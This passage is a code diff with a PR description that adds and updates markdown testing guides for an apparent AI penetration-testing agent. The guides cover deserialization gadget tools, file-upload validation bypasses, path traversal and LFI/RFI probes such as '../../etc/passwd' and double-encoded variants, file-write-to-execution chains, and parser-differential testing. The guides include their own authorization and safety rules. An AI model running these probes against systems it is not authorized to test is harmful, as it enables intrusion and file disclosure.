+6. Model JNDI lookup, reference/object processing, remote codebase loading, and local factory invocation as separate stages
+7. A "blocked" enterprise deserialization endpoint may still be reachable through a proxy/path-normalization mismatch — pair `semantic_confusion`
 
 ## Tooling
 
@@ -172,6 +193,7 @@ Payload generation is the practitioner's core tool here. The sandbox has `git`/`
 | **ysoserial** (frohoff) | Java native | Gadget-chain payloads: `CommonsCollections1-7`, `Groovy1`, `Spring1/2`, and `URLDNS` for a safe no-exec DNS oracle. Needs a JRE. |
 | **phpggc** (ambionics) | PHP `unserialize` / Phar | Framework POP chains (Laravel, Symfony, WordPress, Drupal, Monolog). Needs `php-cli`. |
 | **ysoserial.net** | .NET `BinaryFormatter` / Json.NET | Windows/.NET gadget payloads. Needs .NET/mono — usually out of scope in a Linux sandbox. |
+| **marshalsec** | Java Hessian/Burlap, Kryo, JSON, and JNDI reference tooling | Use only from a reviewed, pinned upstream commit when a non-native Java marshaller requires it. It has no stable release and intentionally bundles historical gadget dependencies; do not treat it as a globally installed default tool. |
 
 ```
 # Java: prove the sink with a no-exec DNS oracle BEFORE any RCE chain

--- a/strix/skills/vulnerabilities/insecure_file_uploads.md
+++ b/strix/skills/vulnerabilities/insecure_file_uploads.md
@@ -67,6 +67,8 @@ Upload surfaces are high risk: server-side execution (RCE), stored XSS, malware 
 
 - Double extensions: avatar.jpg.php, report.pdf.html; mixed casing: .pHp, .PhAr
 - Magic-byte spoofing: valid JPEG header then embedded script; verify server uses content inspection, not extensions alone
+- Detector/consumer differential: make the upload validator and the later parser disagree about type, structure, or validity
+- Probe detector scan windows, recursion/nesting limits, maximum bytes inspected, invalid-syntax recovery, and version-specific magic databases
 
 ### Archive Attacks
 
@@ -120,6 +122,8 @@ Upload surfaces are high risk: server-side execution (RCE), stored XSS, malware 
 - Client-side only checks; relying on JS/MIME provided by browser
 - Trusting multipart boundary part headers blindly
 - Extension allowlists without server-side content inspection
+- One parser validates metadata or leading bytes while another parser processes the full file
+- Type-detection wrappers assumed identical even when they bundle different library/database versions
 
 ### Evasion Tricks
 
@@ -146,8 +150,9 @@ Upload surfaces are high risk: server-side execution (RCE), stored XSS, malware 
 1. **Map the pipeline** - Client → ingress → storage → processors → serving. Note where validation and auth occur
 2. **Identify allowed types** - Size limits, filename rules, storage keys, and who serves the content
 3. **Collect baselines** - Capture resulting URLs and headers for legitimate uploads
-4. **Exercise bypass families** - Extension games, MIME/content-type, magic bytes, polyglots, metadata payloads, archive structure
-5. **Validate execution** - Can uploaded content execute on server or client?
+4. **Map validators and consumers** - Identify the detector/library/version when possible and every later parser, converter, renderer, or browser context
+5. **Exercise bypass families** - Extension games, MIME/content-type, magic bytes, parser limits, polyglots, metadata payloads, archive structure
+6. **Validate execution** - Prove the accepted object reaches a more privileged consumer and can execute or render active content
 
 ## Validation
 
@@ -182,6 +187,7 @@ Upload surfaces are high risk: server-side execution (RCE), stored XSS, malware 
 8. When you cannot get execution, aim for stored XSS or header-driven script execution
 9. Validate that CDNs honor attachment/nosniff
 10. Document full pipeline behavior per asset type
+11. Reproduce detector/consumer mismatches on the deployed library versions; OS packages and language bindings may ship different limits
 
 ## Summary
 

--- a/strix/skills/vulnerabilities/path_traversal_lfi_rfi.md
+++ b/strix/skills/vulnerabilities/path_traversal_lfi_rfi.md
@@ -11,6 +11,7 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 
 **Path Traversal**
 - Read files outside intended roots via `../`, encoding, normalization gaps
+- Write or create files outside intended roots, then evaluate framework-controlled resolution paths separately from direct web access
 
 **Local File Inclusion (LFI)**
 - Include server-side files into interpreters/templates
@@ -51,7 +52,7 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 ### Capability Probes
 
 - Path traversal baseline: `../../etc/hosts` and `C:\Windows\win.ini`
-- Encodings: `%2e%2e%2f`, `%252e%252e%252f`, `..%2f`, `..%5c`, mixed UTF-8 (`%c0%2e`), Unicode dots and slashes
+- Encodings: `%2e%2e%2f`, `%252e%252e%252f`, `..%2f`, `..%5c`, and Unicode lookalikes only where a documented conversion layer maps them to path syntax
 - Normalization tests: `..../`, `..\\`, `././`, trailing dot/double dot segments; repeated decoding
 - Absolute path acceptance: `/etc/passwd`, `C:\Windows\System32\drivers\etc\hosts`
 - Server mismatch: `/static/..;/../etc/passwd` ("..;"), encoded slashes (`%2F`), double-decoding via upstream
@@ -69,7 +70,7 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 
 ### OAST
 
-- RFI/LFI with wrappers that trigger outbound fetches (HTTP/DNS) to confirm inclusion/execution
+- For RFI or URL-capable resource loaders, a correlated callback confirms server-side resolution/fetch. It does not by itself prove inclusion or execution; use a separate response or side-effect oracle for that claim.
 
 ### Side Effects
 
@@ -81,7 +82,7 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 ### Path Traversal Bypasses
 
 **Encodings**
-- Single/double URL-encoding, mixed case, overlong UTF-8, UTF-16, path normalization oddities
+- Single/double URL-encoding, mixed case, UTF-16 or Unicode conversion only when present in the stack, and path normalization oddities
 
 **Mixed Separators**
 - `/` and `\\` on Windows; `//` and `\\\\` collapse differences across frameworks
@@ -147,13 +148,38 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 - Verify symlink handling and path canonicalization prior to write
 - Impact: overwrite config/templates or drop webshells into served directories
 
+### File Write to Execution
+
+Characterize the write primitive before choosing a payload:
+
+- create vs overwrite vs append; atomic replace vs streamed write
+- absolute vs relative path; controllable directory, filename, extension, and bytes
+- text encoding, newline conversion, templating, compression, or report generation applied before write
+- target process permissions and whether symlinks are followed
+- immediate load, hot reload, cache invalidation, restart, scheduled task, or user action required
+
+Then inventory generic execution and influence surfaces:
+
+- view/template search paths and implicit rendering
+- module, controller, plugin, package, or class autoload directories
+- application bootstrap files and language package initializers
+- server/user configuration that changes handler or interpreter behavior
+- job definitions, hooks, startup scripts, cron/task inputs, and CI workspace files
+- logs, sessions, caches, generated sources, and compiled-template directories later included or evaluated
+
+Do not require the malicious file to be directly web-accessible. An HTTP extension allowlist can block `/path/payload.ext` while an internal view engine, autoloader, or interpreter still opens and executes that file through a clean route. Trace public request filtering and internal file resolution as separate security boundaries.
+
+Test search order with candidate marker files or filesystem traces. Trigger the normal route/action that causes internal resolution. Record whether the framework creates, compiles, caches, or executes the artifact and what reload condition is required.
+
 ## Testing Methodology
 
 1. **Inventory file operations** - Downloads, previews, templates, logs, exports/imports, report engines, uploads, archive extractors
 2. **Identify input joins** - Path joins (base + user), include/require/template loads, resource fetchers, archive extract destinations
 3. **Probe normalization** - Separators, encodings, double-decodes, case, trailing dots/slashes
 4. **Compare behaviors** - Web server vs application behavior
-5. **Escalate** - From disclosure (read) to influence (write/extract/include), then to execution (wrapper/engine chains)
+5. **Characterize writes** - Determine create/overwrite/append, path and byte control, permissions, and reload/trigger conditions
+6. **Map resolvers** - Test template/view search paths, autoloaders, plugins, configs, jobs, and other internal consumers separately from direct file serving
+7. **Escalate** - From disclosure (read) to influence (write/extract/include), then to execution through a proven resolver or interpreter
 
 ## Validation
 
@@ -161,7 +187,8 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 2. For LFI, demonstrate inclusion of a benign local file or harmless wrapper output (`php://filter` base64 of index.php)
 3. For RFI, prove remote fetch by OAST or controlled output; avoid destructive payloads
 4. For Zip Slip, create an archive with `../` entries and show write outside target (e.g., marker file read back)
-5. Provide before/after file paths, exact requests, and content hashes/lengths for reproducibility
+5. For file-write chains, first prove a canary is created at the intended path, then prove the normal resolver loads it; document cache/reload requirements
+6. Provide before/after file paths, exact requests, and content hashes/lengths for reproducibility
 
 ## False Positives
 
@@ -184,6 +211,7 @@ Improper file path handling and dynamic inclusion enable sensitive file disclosu
 3. For LFI, prefer `php://filter` base64 probes over destructive payloads; enumerate readable logs and sessions
 4. Validate extraction code with synthetic archives; include symlinks and deep `../` chains
 5. Use minimal PoCs and hard evidence (hashes, paths). Avoid noisy DoS against filesystems
+6. When direct execution is blocked, enumerate internal search paths before assuming the write is low impact
 
 ## Summary
 

--- a/strix/skills/vulnerabilities/semantic_confusion.md
+++ b/strix/skills/vulnerabilities/semantic_confusion.md
@@ -1,0 +1,189 @@
+---
+name: semantic-confusion
+description: Cross-component semantic confusion testing for parser differentials, normalization mismatches, overloaded fields, lifecycle state drift, internal redirects, protocol translation, and validator-to-sink inconsistencies
+---
+
+# Semantic Confusion
+
+Use this skill when two or more components consume the same attacker-influenced value. The central question is not merely whether input is validated, but whether every consumer assigns the same meaning to the value at the moment it makes a security decision.
+
+Typical chains cross a validator, router, proxy, framework, parser, filesystem, interpreter, cache, or browser. A value can be safe in one representation and dangerous after a later decode, normalization, fallback, or field mutation.
+
+## Authorization and Safety Boundary
+
+- Run active differentials only against explicit authorized targets. Preserve destination allowlists and set request, rate, body, response, timeout, and retry ceilings.
+- Perform malformed framing, delayed-body, oversized-input, crash, or resource-exhaustion cases only in a restartable isolated lab with health monitoring.
+- Use synthetic canaries, reversible actions, non-secret protected resources, or a constant per-test callback identifier. Never place target-derived secrets in an OAST label/body.
+- Change one representation axis at a time so the security-relevant disagreement remains attributable to a specific boundary.
+- Pair `browser_security` when the final consumer is a browser context, worker, cache, or navigation state machine.
+- Do not load this skill for pure ownership drift where every component resolves and interprets the name consistently; use `infrastructure_lifecycle` unless a representation, alias, identity, or resolution-result mismatch is present.
+
+## Core Model
+
+Build a transformation graph before spraying payloads:
+
+```text
+raw bytes
+  -> transport parser
+  -> proxy / middleware representation
+  -> authorization or validation decision
+  -> rewrite / decode / normalization
+  -> internal redirect or dispatch
+  -> final sink interpretation
+```
+
+For every edge, record:
+
+- exact input representation: bytes, string, URL, path, header list, object, or structured field
+- owning component and implementation/version
+- transformation performed, including error and fallback behavior
+- security decision made before or after the transformation
+- whether the original and transformed values remain available simultaneously
+- whether a field changes semantic type, such as filename to URL or MIME type to handler
+
+The highest-signal condition is `security_check(value_A)` followed by `sink(transform(value_A))` where the checked and consumed representations are not equivalent.
+
+## High-Value Confusion Classes
+
+### Parser Differentials
+
+- Compare browser, framework, proxy, library, and backend parsing of the exact same bytes.
+- Test duplicate and comma-joined fields, first-match vs last-match behavior, invalid-token recovery, comments, quoting, and empty members.
+- Include structured formats and metadata: URL, MIME, JSON, multipart, XML, cookies, forwarded headers, and serialized objects.
+- Treat leniency as a security feature only when every downstream consumer is equally lenient in the same way.
+
+### Normalization and Canonicalization Drift
+
+- Map percent-decoding count, Unicode conversion, slash/backslash handling, dot-segment removal, case folding, IDNA, numeric IP conversion, and filesystem cleanup.
+- Compare string-prefix checks with segment-aware or origin-aware comparisons.
+- Test malformed Unicode and replacement behavior; a rejected code point may become an allowed delimiter or wildcard later.
+- Test path, query, and fragment separately. Browsers and routers commonly transform each source differently.
+
+### Field and Type Overloading
+
+- Identify shared fields reused for different concepts: path vs URL, content type vs handler, display name vs executable name, route vs filesystem location.
+- Trace every writer and reader of the field across the complete lifecycle.
+- Look for implicit fallback: when the intended field is empty, another field becomes authoritative.
+- Exercise fields after errors, rewrites, subrequests, retries, internal redirects, and protocol upgrades/downgrades.
+
+### Lifecycle and State Drift
+
+- Trigger error paths that should terminate processing and verify that later phases actually stop.
+- Look for stale metadata copied into a new request, subrequest, background job, cache entry, or retry.
+- Compare direct external access with internal dispatch. Edge controls may inspect the public URL while an internal resolver opens a different path or invokes a different handler.
+- Test order-dependent behavior: validation before rewrite, auth before route normalization, or content classification before processing.
+
+### Boundary Translation
+
+- Map HTTP/2 to HTTP/1 translation, proxy to application rewriting, URL to filesystem resolution, upload detector to content consumer, and client router to API request construction.
+- In a restartable lab and only when supported by evidence, vary framing, bounded delays/body sizes, content type, pseudo-headers, and method conversion. Check target health after resource-sensitive cases.
+- Do not assume a WAF or authorization sidecar sees the full body or final normalized request.
+
+### Namespace and Resolution Fallback
+
+- Identify names resolved across multiple scopes: local path, environment `PATH`, cache, private registry, public registry, plugin directory, template search path, or autoloader.
+- Record lookup order and what happens when the intended entry is missing.
+- Compare protected package/module names with exposed command, binary, handler, or alias names. For npm, a scoped package can expose an unscoped `bin` name, so the protected package name and invoked executable may differ.
+- Treat automatic remote fallback or search-path fallback as an execution boundary.
+- Load `npx_confusion` when `npx` or `npm exec` may reinterpret a missing executable as a public package spec.
+
+## Reconnaissance
+
+### Black-Box Mapping
+
+1. Capture a clean baseline with raw request and response bytes.
+2. Change one representation axis at a time: encoding depth, delimiter, duplicate, separator, method, protocol, body framing, or Unicode form.
+3. Diff status, headers, body digest/length, timing, redirects, cache state, and out-of-band callbacks.
+4. Replay through different paths: direct origin vs CDN, HTTP/1.1 vs HTTP/2, public route vs alternate host, synchronous vs background processing.
+5. Cluster responses by behavior before escalating. Small differentials reveal component boundaries.
+
+### Source-Aware Mapping
+
+- Find every read and write of shared request/context fields, not just the obvious sink.
+- Trace route matching, auth middleware, rewrites, internal redirects, handler selection, and response generation in execution order.
+- Inventory decode/parse/normalize calls and note whether return values or errors are ignored.
+- Search for compatibility fallbacks, legacy aliases, permissive recovery, default handlers, and search-path iteration.
+- Inspect packaging and deployment defaults; distro configuration, enabled modules, plugins, and symlinks often determine reachability.
+
+## Differential Test Matrix
+
+Build a bounded matrix from relevant axes instead of blindly combining everything:
+
+| Axis | Representative variants |
+|---|---|
+| Encoding | raw, once encoded, twice encoded, mixed case, malformed Unicode |
+| Structure | duplicate, comma-joined, empty member, quoted, comment-like suffix |
+| Path | `/`, `\\`, `//`, dot segments, absolute, sibling-prefix collision |
+| URL | userinfo, numeric IP, alternate IP radix, trailing dot, fragment/query split |
+| Transport | HTTP/1.1, HTTP/2, chunked/fixed body, delayed DATA, oversized body |
+| Lifecycle | normal, error, retry, internal redirect, cache hit, background worker |
+| Consumer | edge, application, library, filesystem, interpreter, browser |
+
+Select axes supported by evidence from the target. Record which component saw which representation.
+
+### Repeatable Harnesses
+
+- For two local parsers, canonicalizers, or validator/consumer functions, load `hypothesis` and express the expected relationship as a property. Bound sizes/examples and keep the minimized disagreement as a regression test.
+- For an ordered HTTP flow with cookies, redirects, captured values, and assertions, load `hurl` and encode vulnerable, fixed, and negative-control environments using the same request chain.
+- Use raw-byte or protocol-specific harnesses when a high-level HTTP client would normalize the ambiguity away.
+- Separate input generation from transport. Generators that are safe against pure local functions become active fuzzers when connected to a live target.
+
+## Chaining Strategy
+
+Treat the first differential as a primitive, then ask what authority the later consumer has:
+
+- auth or ACL bypass -> protected route or file
+- path/URL confusion -> source disclosure, SSRF, local socket, or unintended handler
+- detector/consumer mismatch -> active upload processing or inline browser execution
+- internal redirect state carryover -> handler selection or policy bypass
+- search-path or namespace fallback -> attacker-controlled code resolution
+- browser/router decode -> client-side path traversal, CSRF-like action, SSRF, or XSS sink
+
+Enumerate existing local gadgets only after the primitive is proven. Prefer generic classes such as interpreters, template engines, debug tools, package scripts, local sockets, and autoload paths over a vendor-specific file list.
+
+## Testing Methodology
+
+1. **Define the invariant** - State what all components are expected to agree on: origin, path, type, handler, identity, length, or package name.
+2. **Draw the graph** - List consumers and transformations in real execution order.
+3. **Locate early decisions** - Mark validation, auth, WAF, cache, and routing checks.
+4. **Locate late meaning changes** - Mark decodes, rewrites, fallback, internal dispatch, and sink parsing.
+5. **Build a focused matrix** - Exercise only transformations supported by the stack.
+6. **Isolate the disagreement** - Produce paired inputs that differ at one boundary and explain both interpretations.
+7. **Prove the primitive safely** - Use a synthetic protected canary, reversible marker, constant callback identifier, or no-op handler whose behavior and side effects are understood.
+8. **Escalate by capability** - Track Read -> influence -> write -> dispatch -> execute transitions with evidence and prerequisites for every edge.
+9. **Cross-check versions/configurations** - Reproduce on a fixed version or hardened configuration when possible.
+
+## Validation
+
+A valid confusion finding should include:
+
+1. the exact bytes or structured input supplied
+2. the representation observed by the security control
+3. the different representation observed by the final consumer
+4. the transformation or lifecycle event that created the difference
+5. paired control and exploit results across repeat runs
+6. version, protocol, configuration, and interaction prerequisites
+7. a minimal impact proof that does not depend on unrelated undefined behavior
+
+## False Positives
+
+- Different error messages with identical final authorization and sink behavior
+- A parser accepts odd syntax but downstream consumers preserve the same safe meaning
+- A normalization difference visible only in logs, with no security decision between representations
+- WAF bypass where the application itself rejects the request identically
+- Version-specific behavior claimed as universal without testing the relevant deployment
+- A search-path candidate that is attacker-named but cannot be created, claimed, loaded, or executed
+
+## Pro Tips
+
+1. Begin with relationships and shared state, not endpoint payload lists.
+2. Preserve raw traffic; high-level clients often normalize away the exploit before sending it.
+3. Error paths are alternate lifecycles. Verify which fields survive and which phases still execute.
+4. Compare direct and internal access separately; ingress policy rarely governs framework file IO or handler dispatch.
+5. When a prefix allowlist is used, test a sibling sharing the prefix and verify with a segment-aware comparison.
+6. Distinguish presence, reachability, and impact. Each needs separate evidence.
+7. Generalize a finding by naming the disagreement class, not by copying its final payload.
+
+## Summary
+
+Semantic confusion exists when a security decision and a privileged consumer disagree about the meaning of the same attacker-influenced data. Model the entire transformation lifecycle, isolate one disagreement at a time, and prove both interpretations. The reusable unit is the boundary and its invariant—not a CVE-specific string.


### PR DESCRIPTION
## Summary

- add semantic-confusion analysis for cross-layer parsing, normalization, routing, and representation mismatches
- add browser-context security coverage for messaging, navigation, workers, caches, and XS-Leaks
- add Electron renderer, preload, IPC, navigation, and native-capability analysis
- update the directly related source-aware, header, deserialization, upload, and traversal skills
- add all three skills to the notable-skills catalog

## Stack

5 of 6. Base: `agent/http-differential-tooling`.
Depends on #1122.

## Validation

- Strix skill loader
- `tests/test_skill_dir_extension.py`
- repository pre-commit hooks
- `git diff --check`
